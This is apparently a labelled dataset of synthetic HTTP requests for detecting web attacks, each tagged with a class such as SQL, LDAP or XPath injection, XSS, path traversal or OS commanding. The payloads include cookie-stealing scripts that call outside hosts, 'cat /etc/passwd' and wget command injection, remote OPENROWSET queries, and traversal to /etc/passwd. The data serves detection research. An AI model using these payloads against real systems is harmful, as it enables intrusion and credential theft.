GET /neEsl5aln0caw0reIa79/sqWuQdgQ/rKjWGYKzRVgGr/nKh7GFO/todhlgh6hhdseaoz8lea/tMIP5q.sh?innd0nmaecrs=uwiyh7E%27&oel3tmI2ttbrr=ii%24hY&X-ZJURstyleP3yin=5762&c9hnsahRafeCds=np2x3c5IB-a&ikyol0k2RfWG=ifntmpsl%7Cenf HTTP/1.1
Host: www.15tE.st:7276
Connection: td7ssNh
Accept: video/mpeg, application/*;q=0.4
Accept-Charset: koi8-r, iso-8859-7, iso-8859-1, koi8
Accept-Encoding: deflate;q=0.3
Accept-Language: *;q=0.6
Cache-Control: ilhlt5='ntg1L'
Client-ip: 203.108.154.8
Cookie: ij=44615  or   1<   ir8ndb/Eteotq/slo/child::text()[position()=38]     or     3130='] | /* | /foo[bar='
Cookie2: $Version="8"
Date: Sun, 24 Apr 05 02:15:37 CET
ETag: W/"-yI25KGVjmCgJ6e.kTHw"
Expect: 100-continue
From: Eeet7cah@Ioed.uk
If-Modified-Since: Thu, 11 Feb 10 01:06:32 UTC
If-Unmodified-Since: Fri, 31 Oct 08 14:17:40 UTC
If-Match: *
If-None-Match: *
If-Range: "s7oI5-BzugjQIf1N9B"
Max-Forwards: 87
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic dFR1bWV1OllSYnFzZQ==
Authorization: NTLM NG9FeGhzdG9ob3RvZmgyYXJ2NW9oYWRleXNuc2JUaGVlU0FtdG14Z3I3
Range: -645348
Referer: /hvYs.txt
TE: deflate,gzip;q=0.4
Trailer: If-Modified-Since
User-Agent: n1jUd@g@2 http://www.be8C.cz
UA-CPU: 68000
UA-Disp: 574,086,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 827x1746
Via: FTP/2.5 254.152.131.135, FTP/2.2 www.581eig.htm, FTP/1.6 106.133.212.33
Transfer-Encoding: deflate
Upgrade: g0gReu/5.3, d26sc4/5.7, hsu/8.5, bnuuw8/7.5, avaew/7.4
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Forwarded-For: 60.162.169.118
X-Serial-Number: 04886
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48397
Start - Id: 37386
class: LdapInjection
GET /wexec_C/trneba/ydrop4Haz.php?aGv5aho2ufe=drgsnoo+tnnull&G0w5317=oTm&baaymdrtnr=%7Ez-+i5srfae2Si HTTP/1.1
Host: 118.76.216.40
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: nnw)(|(9nFxA=*)
Accept-Language: *
Cache-Control: no-cache
Date: Thu, 13 Jul 06 01:17:26 GMT
Expect: eaertym
If-Modified-Since: Wed, 28 Jan 04 11:00:08 UTC
If-Unmodified-Since: Mon, 31 Dec 07 12:37:39 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 571
Pragma: no-cache
Authorization: NTLM RUhkaTh0SW1kd25oemZhaXNobG5hcmVuZThvYVNldHN1dGh1cg==
Referer: http://www.rehiteea.gov/Lg7d/GeekeIp0.tiff
Trailer: User-Agent
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 9.9; li-n6; rv:7.6.8) Gecko/09827806
UA-CPU: 68000
Transfer-Encoding: gzip

null

End - Id: 37386
Start - Id: 36353
class: PathTransversal
GET /ofpoUdnooi/eSqrv05t7_Cm2SUISx/64ht.php3?ur=t&mma8oy2le6xmreh=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&lt=tmochaw%27 HTTP/1.1
Host: 119.189.83.203:80
Connection: zsrnlfd
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, compress;q=0.0, deflate;q=0.4
Accept-Language: S-t9e7e;q=0.2, fsd-ndhpatts;q=0.2, 1nneaa-cn5r;q=0.0
Cache-Control: no-store
Client-ip: 102.199.117.40
Cookie: hlOtpsaewh7re57=1299271;gWmhUg=242398838;l8e9tehhiyhie=i~hsopt[a0d|ev;dFEQLlLAMk=ebtSntrq;1Z5Sncx23VeQ@=er+;lhqiGTh1r=r%8)ies
Cookie2: $Version="7"
Date: Sun, 10 Aug 08 17:32:40 GMT
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: 100-continue
From: sotSFlSe@qiksat.biz
If-Modified-Since: Wed, 19 Mar 08 14:19:50 CET
If-Unmodified-Since: Sun, 04 Jul 04 06:26:59 UTC
If-Match: "ZZKNmk7E5@hKVdxm"
If-None-Match: "4zkWOCAqO@4N1p18"
If-Range: "JipMFmiMMaLo9Elqk"
Max-Forwards: 57
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: Digest nc=a4815328
Range: 75-618834,757-411,77394-267269
Referer: /ifseeiah/Xoa7T/lL64crf/ne3ons/leGu.gz
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/4.2 (X11; U; Linux i586 9.7; yr-aa; rv:9.8.2) Gecko/75692738
UA-CPU: MIPS
UA-Disp: 7628,9010,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 636x8824
Via: HTTP/9.8 www.xjod6ef5.gif:0461
Transfer-Encoding: identity
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 024 www.otnwtaol.tiff "b9zrireueiveays" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36353
Start - Id: 47632
class: XSS
GET /n9VYWh7cm6oQW/s2y5AeIf-R/Sqrnodexp_gmNwDyC/aseqiaua9nt/dZ/teRta/nmies/aencqIsTtrrNai/NGOINF.jsp?sEezyEhl=177&tHNr2e2wqer=todphpcyr&B6aUz=tekTwe&tmEmobs=ssi&2LNrYl.ItelnetXK-=%24d+g%40esA+between&3rhogee6ele=H&A5=z+&i4fromET=9&0Ag0h=En&7a3a=22&pdRpositionPhttpMNUAbk=4320&fnbgowi=lrvprocessing-instruction1nihen&ee=%3Clink+++++rel++%3D+%22++stylesheet++++++%22+++++href++++%3D++%22+++javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F120.59.12.60%2Fge.swf%27%2Bdocument.cookie%29%3B%5D++++%22+++%3E&s6vnraqloSh=qfl5wn&nzRns=20517630 HTTP/1.0
Host: 141.251.61.85
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, cp-950, iso-8859-4, utf-7;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 208.225.246.243
Cookie: HBQWyIBJQ=4724736;ws=u5w5xqW4X;H_httpsSncg.z=6QrXb;oeHitrinooo=ncu9Iuodo;dniEp7khdeyir=lNSG8f_;gcRnyeiq0oreega=hazwtdt1xiu
Cookie2: $Version="5"
Date: Wed, 30 Jun 04 24:52:32 GMT
ETag: W/"vCJ4ze41NxoBsap4"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Thu, 01 Mar 07 05:50:37 CET
If-Unmodified-Since: Mon, 25 Aug 08 01:48:03 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Jul 07 17:46:00 GMT
Max-Forwards: 28
MIME-Version: 5.8
Pragma: stu='my'
Proxy-Authorization: ni1yEi btas=Btiewr
Authorization: Basic c3pzeWhXOnRsc2F1dg==
Range: -2,9608-,-156992
Referer: /o4rsmcdu/rloei9k.png
TE: trailers,deflate;q=0.3,trailers
Trailer: Warning
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 9.6; se-hy; rv:6.3.8) Gecko/43128320
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 0.1 www.rteuti.jpg
Transfer-Encoding: compress
Upgrade: euleee/5.6, eNo/6.5, estIph/1.3
Warning: 544 147.190.206.64 "e6Olrstooilettn" 
X-Forwarded-For: 111.147.190.89
X-Serial-Number: 6943669939
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47632
Start - Id: 36697
class: OsCommanding
PUT /oGU1YW0mCo/etpsyf2eu1qie6k8i0h/aP7AvAYYRniwhMv4x/awEgYIpHClXTrYCPsB/9EwxYqxyn9d/s_PLedaEr8Fx.jpg? HTTP/1.1
Content-Length: 170
Content-Language: h9,yBss1
Content-Encoding: identity
Content-Location: http://www.wtapYeN.org/watCl57/uneft/isct/ipenhnNs/lGnodnT.jsp
Content-MD5: bmV0b244dG9Fd3lQcm5hZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 24:38:47 CET
Last-Modified: Fri, 05 Mar 04 19:28:49 CET
Host: www.posEeq.de
Connection: keep-alive
Accept: application/zip
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 83.189.215.58
Cookie: its=2eiyaasF7oe;ncuO4ahqzLUz_=13395375;yYyic7enw=cSBIGAS.9_;yrekIaxae=mV3m9-
Cookie2: $Version="2"
Date: Fri, 26 Mar 04 06:32:30 GMT
Expect: 100-continue
From: debomi@hLAy.be
If-Modified-Since: Tue, 26 Jun 07 04:57:58 GMT
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Tue, 06 Apr 04 09:26:19 UTC
Max-Forwards: 649
MIME-Version: 8.8
Proxy-Authorization: Basic RWNlanNsNG46dGM3MHhv
Authorization: Digest username="lruyb"
Range: 6660-
Referer: http://7DlDdt.st/pepi8o/oAq9e/iscoEe3/6nrt/vi44.doc
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: lUxCNG http://www.n44nhu0a.fr
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: FTP/4.3 www.nfed.jpeg, 0.4 207.157.93.68, 6.6 221.107.236.159
Transfer-Encoding: identity
Upgrade: rqbee/8.8
X-Forwarded-For: 123.125.191.125
----: -------------------------

0WwNwUN7=ebaait&rmH77j.FM= tn(div\wsch&UXS-M7cNwBU=%0a    cat     %0a/etc/passwd   %0a&tsm83aEa1a7=eO1Tidoptb~milndtU&lRnam=873&ey=iPb7&EnpoNaSSh8am=ot6ts

End - Id: 36697
Start - Id: 41872
class: SqlInjection
GET /%uA@w@I71q5dconnect/ie4jb8/l_hay02@M9hyg.tiff?SV1qQy=tb.%40E1v&o7Noiti4si=5184584&omeTyuex=rd%407cXSaZqq&nposxexp7u=ett&YwexecunionH=%3B+++++select++*++from+OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3DtiOwAth%3Bpwd%3Dsmmerl%3BNetwork%3DDBMSSOCN%3BAddress%3D145.76.64.232%2C68505%3B%27%2C%27select++*+++++from+++++rrehinxqad%27%29&6hForgvrN6=723&patnez=29&rye=%5Bae&dcxhnhaaolcnr=f HTTP/1.1
Host: 44.84.62.158
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 43.178.27.154
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="40"
Date: Fri, 24 Apr 09 13:16:50 UTC
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: estmtade=iia9d
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Thu, 27 Jan 05 05:45:47 UTC
If-Unmodified-Since: Sun, 29 Jun 08 08:27:53 GMT
If-Match: "zN46Y0TmmL92d7q1-fS"
If-None-Match: *
If-Range: Fri, 08 Jun 07 06:59:16 CET
Max-Forwards: 407
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: cerhke srest=lwcshsc
Range: 2764-93323,17883-91
Referer: http://seht.cz/ewtoh.asp
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.5 (Windows; U; WinNT 7.2; ly-bA; rv:4.0.8) Gecko/90207126
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: etroo/3.6 www.coao.css:6
Transfer-Encoding: sfmai
Upgrade: prc/4.5, 2sFe/0.3
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41872
Start - Id: 35605
class: XPathInjection
GET /eWJ-jSK293g/aa3t/nfLc2ZnQ.bjqS8Mi_h4.html?oroeaa8sNE=noiheobe%27+++or++1%3C+++gNs%2Ftzya%2Fve%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D34%5D++or+%27aedej%27++%3D++%27&uobew2hN0atbcrf=Meurhe%5Ct3hs%298+r&RUN8GaxhttppLld=%3Cqt%28Utdppsr4Enenoeo&9leOacedhit6z2=aXX53MJ&ht1popeerao=46681 HTTP/1.1
Host: 23.255.210.238
Connection: keep-alive
Accept: image/*, audio/x-wav;q=0.0, application/zip
Accept-Charset: euc-kr;q=0.3
Accept-Encoding: identity;q=0.6, deflate, identity, compress;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 71.205.202.98
Cookie: jin5TCJIN5pp=zph;zUar6vco=4nE;d7bscadajeesp=llthIoe;F144X=y5stdinca~ecd;n@bKTW=n4x
Cookie2: $Version="6"
Date: Wed, 27 Jun 07 06:48:15 CET
ETag: W/"tF5Sw0AaliY@Erh7FZ"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sun, 28 Oct 07 03:42:36 UTC
If-Unmodified-Since: Thu, 04 Mar 10 11:04:07 GMT
If-Match: *
If-None-Match: "HvdHIFl-pKMGPb1k1hw"
If-Range: "X@7uJwphzcqAWxX"
Max-Forwards: 5357
MIME-Version: 4.8
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: NTLM RWdkcFNhNmFzZHJtQW1reGFPUmx0aHcxbG9odHR4bmlzZ29ldnl0dW9v
Range: 1278-6
Referer: /horSE/dhimr8Tn/tOIbnpna.fgf
TE: trailers,deflate,chunked
Trailer: Host
User-Agent: bzw8o87j http://www.wRSe2h.be
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 138x439
Via: 4.4 www.erlu.jpeg, 0.3 99.180.156.149
Transfer-Encoding: compress
Upgrade: eto3T/9.1, 9rfo3l/2.2, nuUaek/3.0
Warning: 830 www.Ebfqtd.jpeg "soaunetffqhiopqzirt" 
X-Forwarded-For: 125.75.182.236
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35605
Start - Id: 35711
class: XPathInjection
GET /bIPdh/hNtjuM88YdPI/dgbtircenbei8afPi/j7JUGl5JIUc/F@/sam4q05reo3lrehhhT/smUrmXHSmBX4Xti/2K/iEmsa/2hX-/ywdritboeaae.jpeg?Yu08httpbgsoundA2G=6&0lcsdtsrSe=86++or++stdTe%2FemeqH5%2Foo%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D+++or++77118%3D&cEaaleiODu=33005743&yjTzyIKlj=r+azsvumowtie&towts=h%3Dt&1-I3PF=32550&asdDsroSHadnahm=xd%40ftcy HTTP/1.1
Host: 28.220.25.195
Connection: close
Accept: audio/*, audio/basic;q=0.9, audio/basic
Accept-Charset: x-mac-cyrillic
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=9978
Client-ip: 144.129.84.108
Cookie: suctdehsisY=9o= 
Cookie2: $Version="64"
Date: Sun, 20 Mar 05 01:11:07 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Sun, 01 May 05 15:12:17 UTC
If-Unmodified-Since: Sun, 26 Jun 05 11:12:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 03
MIME-Version: 8.0
Pragma: 6tlirn=dI99Re
Proxy-Authorization: Digest cnonce="N2rrnfo"
Authorization: Basic ZWRzeFRpaGI6dHNybWlw
Range: 5225-,8-9,1-
Referer: /y8we6n.conf
TE: trailers,deflate
Trailer: User-Agent
User-Agent: etdmtcr/0.3.4
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: 0.8 www.ssuT.png:50909, FTP/9.3 8.221.183.118, 2.6 www.ctgmn1.js
Transfer-Encoding: gzip
Upgrade: 9fhE7S/3.9
Warning: 793 32.218.57.169 "eazenA2aeien9eE9jtir" "Sun, 17 Jan 10 06:57:02 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35711
Start - Id: 47897
class: XSS
GET /xp.X0XESZ/aeenDersi/O7tb82_p.png?ri=%3Cimg%2Bsrc%3Djavascript%3A++++alert+%28%27urlbap.pstk%27%29+%3E HTTP/1.0
Host: www.maho1.ch
Connection: keep-alive
Accept: video/mpeg;q=0.2
Accept-Charset: iso-8859-3, cp-932;q=0.5
Accept-Encoding: identity;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 255.200.38.137
Cookie: n8ehldh7pT6ed=vstdinrtafromlogssr'ol7+li7;tih73ren=93|ia7ilibnertCeni;g-B0743S7qq=659;sw=58;eIsleel=632513;oaqrnRRvee=24933
Cookie2: $Version="7"
Date: Fri, 16 Mar 07 07:56:36 GMT
ETag: "mGKHO@G07@ZWa.b4v"
Expect: eiJ8sc
From: rigu@deao.net
If-Modified-Since: Sat, 16 Feb 08 15:55:04 CET
If-Unmodified-Since: Sat, 29 Apr 06 09:50:40 UTC
If-Match: *
If-None-Match: "k0IdiQkkiO.c1WsjFRBo"
If-Range: "l5GZ8QJ@b1YUE1VTo9"
Max-Forwards: 3
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: heh4ty Atut=eajVe0in
Range: -635,-78,-03
Referer: /nrniwhht/DpeO.fgf
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
User-Agent: tpmFDkX6h http://www.hm1tdlt.org
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 229x467
Via: 1.8 246.164.138.81
Transfer-Encoding: deflate
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 274 128.194.66.58 "9hsdoz" "Fri, 21 Jan 05 16:59:18 CET"
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47897
Start - Id: 45049
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 46.106.10.16
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-2022-jp, iso-8859-6;q=0.0, iso-8859-6;q=0.6
Accept-Encoding: 
Accept-Language: ZhiftxeE-pn;q=0.8, t-oe8C;q=0.6, beaees-cdd, ietectre-o, e-hnly;q=0.9
Cache-Control: min-fresh=5
Client-ip: 0.96.11.108
Cookie: 7taMehizeT=nd5tIf3eotte;7pVTBZ=zso;ilisxtGai=311316;ovocd9LOeneat=h)pseoiiH5n
Cookie2: $Version="8"
Date: Wed, 12 Aug 09 10:43:13 CET
ETag: "eEdyqtDBntIXlsCd"
Expect: 100-continue
From: Otai@40ezesm.uk
If-Modified-Since: Sat, 01 Dec 07 15:54:58 CET
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 87
Pragma: no-cache
Authorization: Basic cmFpYWllb2M6RG9lb09kdDc=
Range: -6543,-6,-30
Referer: /t1WE/vmo5new/inelatu/ew2s2t5/sstrl3bs.gz
User-Agent: Mozilla/6.5 (X11; U; Open BSD i586 8.4; tD-cn; rv:4.4.9) Gecko/75275105
UA-CPU: PowerPC
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 127x929
Transfer-Encoding: gzip
Upgrade: sLa/4.9
Warning: 905 80.144.212.89 "cvcWhwiseqlaaOni" "Wed, 28 Jan 09 19:24:15 UTC"
X-Forwarded-For: 33.238.34.199
X-Serial-Number: 986205312934896
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45049
Start - Id: 46880
class: XSS
PUT /nTxfS-32PhSUJ.aspx? HTTP/1.0
Content-Length: 382
Content-Language: nhEe,yuRi
Content-Encoding: identity
Content-Location: http://uiea.uk/t9Nmd/ni2iFes.php3
Content-MD5: aTNzRGlqdG1keW5lVW1kYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Nov 06 10:27:09 UTC
Last-Modified: Mon, 25 Sep 06 14:12:26 GMT
Host: www.D7ynnVp9.st
Connection: hedre
Accept: audio/basic, application/*;q=0.8, application/x-tar
Accept-Charset: euc-cn, iso-8859-3, x-mac-turkish;q=0.6, windows-874
Accept-Encoding: deflate, deflate;q=0.9
Accept-Language: 4eeth-hebud;q=0.7, iMTn0w6d-fehLA, rbNuh-ti4N
Cache-Control: no-transform
Client-ip: 152.184.163.84
Cookie: alaTm=0851242;R@WulikeK=tt;soLwi=i-pGtHU;sEdokeOue5on=crsepSeo>tnph-teh
Cookie2: $Version="8"
Date: Mon, 12 Nov 07 22:23:21 UTC
ETag: W/"HWqqqDJevjUbS.ZrE"
Expect: eimHsos=aoe09mew;tEeut=cmfm
From: xorersew@0i1thu.fr
If-Modified-Since: Tue, 17 Nov 09 12:30:38 CET
If-Unmodified-Since: Sat, 03 Apr 04 02:59:33 UTC
If-Match: *
If-None-Match: "cB3ebdaEj-Wo8XLHUN"
If-Range: *
Max-Forwards: 564
MIME-Version: 8.9
Pragma: ngfks9='mlj'
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest qop=auth
Range: -122
Referer: http://www.iE2ea5.it/mo6lW/bhossaa/fthrjf/01hb/hm7d.mpg
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 0.9; xh-in; rv:7.1.2) Gecko/63762039
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 1.2 www.daOrgscw.tiff:2, s4iyo/1.3 249.164.153.118, 0.1 41.12.15.67
Transfer-Encoding: compress
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 479 70.40.194.240 "olAdtnTro" "Wed, 14 Apr 10 22:00:41 UTC"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t7=ston3prnloo&sxbn=783412&Eohci5ohxPsEe=6424&7bzrl2eeonYonnl=eiscr c+h&rxNyws6Imw=740&oea=hooqmhx)r&qtRztH0pJ.=<![CDATA[<!--]]><script>[document.location.replace  ('http://www.to.com/cgi-bin/ri.cgi'+document.cookie);]//--></script >&eremh=sqQ6SD&IUrtsol2nlaosh=7&dactnntsTe0czup=e34db5&lmywt=|m&t5nsioRoadIiau=oyve_

End - Id: 46880
Start - Id: 42921
class: OsCommanding
GET /Mv/7lcNBAoyweQ1QK6p/maeietrtht2twehsa/fxjcmieoeO/sEaauaaes/fivaLxG3iJSh/edGxdeK3r2/nwlieyhmra3pe/nyMyUtt2eigIdbmt5/ikC8Y4_/t.2M9@s.js?Sbau3d0a0hm=uVzEC8A.7S&nt=yorphpATsystemjak&yol8seeaY0rDie=ree-azF+u2ob&eagneae1=78609&grzoaln34iime=955128&eobpieyi5r=3731068525&efrest0dfnn6i=4cAeeddc6rie HTTP/1.1
Host: www.dntWa8q41.it
Connection: keep-alive
Accept: video/quicktime;q=0.6, video/mpeg;q=0.3, image/gif;q=0.3
Accept-Charset: x-mac-cyrillic;q=0.6, iso-8859-8;q=0.1, x-mac-roman;q=0.9, euc-cn;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: "  ;   /usr/bin/wget www.atarar.com/es;
Cache-Control: no-cache
Client-ip: 86.91.237.39
Cookie: fKiyt=ehucHwwx;we=p;uhzngatwdiT=netcatoa;t4xetnui=oQz;llGypndtyze=81513706
Cookie2: $Version="903"
Date: Wed, 13 Sep 06 16:11:35 GMT
ETag: W/"S5VHMCUcdCF0564I3"
Expect: ohxn
If-Modified-Since: Tue, 10 Feb 09 06:46:32 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "egwlNH@JjxVbFnFOZN"
If-None-Match: "lcM8SE8.rlz8KQz"
If-Range: Mon, 09 Nov 09 12:49:17 GMT
Max-Forwards: 047
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM bFJ4YWl2dkVqYUw1dHBMdGVvb3RyYWJHeGVkV2FpdHJvdA==
Range: 761836-
Referer: /nOhah.asmx
TE: trailers,chunked;q=0.4
Trailer: Via
User-Agent: aenD5ie7i1csn4mTtLbi
UA-CPU: Sparc
UA-Disp: 0478,435,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0091x1254
Via: HTTP/8.8 186.54.26.152, 2.0 www.aieeiolT.tiff, 5.3 235.102.137.209:46775
Transfer-Encoding: identity
Upgrade: olEofa/6.2, 8uc/9.8, mieh/1.6
Warning: 992 www.tgxepEC.tiff "yer0iasse4hhsuslog" 
X-Forwarded-For: 214.193.235.54
X-Serial-Number: 911589515153231

null

End - Id: 42921
Start - Id: 42400
class: SqlInjection
GET /oo4ib9s2agnb2Mrt/sntraa/cAnph-Bd4F/varsGZNinetcatxctY0No/dFTPGR@9l2c6G/stdinc8HyKZE.mdb?nfuyt=agwp-2t4huyfttgd&gr1uadosbz=fusrio&extsmraaeulu=tuanincludeOe&b9zTboot.inihL_=%3B+select++*++from++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3Dugnti%3Bpwd%3DoghT0hTtr%3BNetwork%3DDBMSSOCN%3BAddress%3D13.25.200.13%2C90123%3B%27%2C%27select+*+from+w0e1n%27++%29&pezslh=nIpe&do=eeyEea0h2iro%7Ehd%5C2&esteIcnisuNS=18968017&k5a9IV=execwneshh++%5D&Gl-1rgroup bySobjectAee=passthruiS12cznQUtasn&dEaute=ViinserttN&ETffq=eua8i&pzlxrirP6ns=bY1mJKYdJf7b HTTP/1.0
Host: www.eebcyuSAk.net
Connection: stpsi
Accept: audio/*, video/*
Accept-Charset: euc-jp;q=0.3, iso-8859-4;q=0.4, x-mac-greek;q=0.4, x-mac-icelandic, x-mac-turkish
Accept-Encoding: identity;q=0.1, identity, deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 27.25.131.119
Cookie: xoxI=s;pt8jfbrn=wnlhalnve77rlr;R0t6Enc1aiori=0dD>eet s|/LneuousteC;i0KrddNsmt=609248223;ddbailtatjoinnr=AeedSieynbtghemn;Nssm1eondvz=o9 1t(ne((t -
Cookie2: $Version="12"
Date: Sun, 24 Feb 08 04:05:58 UTC
ETag: "i@eKiHVxyOned_iJ9n4"
Expect: aobdyaog
From: aespw@dgaxhlomnn.it
If-Modified-Since: Mon, 09 Aug 04 24:14:14 CET
If-Unmodified-Since: Sat, 15 Aug 09 06:47:05 GMT
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: JslOti auhh=xthke
Authorization: r1dh9i e8eemggy=tumI
Range: -4,92807-997,-01613
Referer: http://www.d4th.net/oht7c.nsf
TE: chunked;q=0.7
Trailer: Host
User-Agent: 055rGym0 http://www.inndh.st
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: compress
Upgrade: Cuscnt/3.0
Warning: 630 www.qHomhe.tiff "xvqr" 
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42400
Start - Id: 39090
class: LdapInjection
PUT /eeogjYi1Nndeqp/dy/nrrfaojed0Isg/fe8ZcYtCYNUH/3egr/yG0LiGFeNlos7nnyM/a3nsmonpte2a/h1Gxv.jsp? HTTP/1.1
Content-Length: 149
Content-Language: ohnde3da
Content-Encoding: compress
Content-Location: http://dseeL.fr/eioga/ureaa.png
Content-MD5: ZW9lSW94T29scm5vc25lQg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Jul 06 05:14:01 CET
Last-Modified: Sat, 14 May 05 05:48:49 GMT
Host: 172.117.222.187:3760
Connection: og4liL
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 62.174.103.47
Cookie: deetshpniale=45ar)(   | (hniq=*);lOhiennT3at3a=384064
Cookie2: $Version="8"
Date: Sun, 03 Oct 04 11:47:33 UTC
ETag: W/"TXo-WdtSklJjIjkx3Zrw"
Expect: 100-continue
From: sqarh@agbp.net
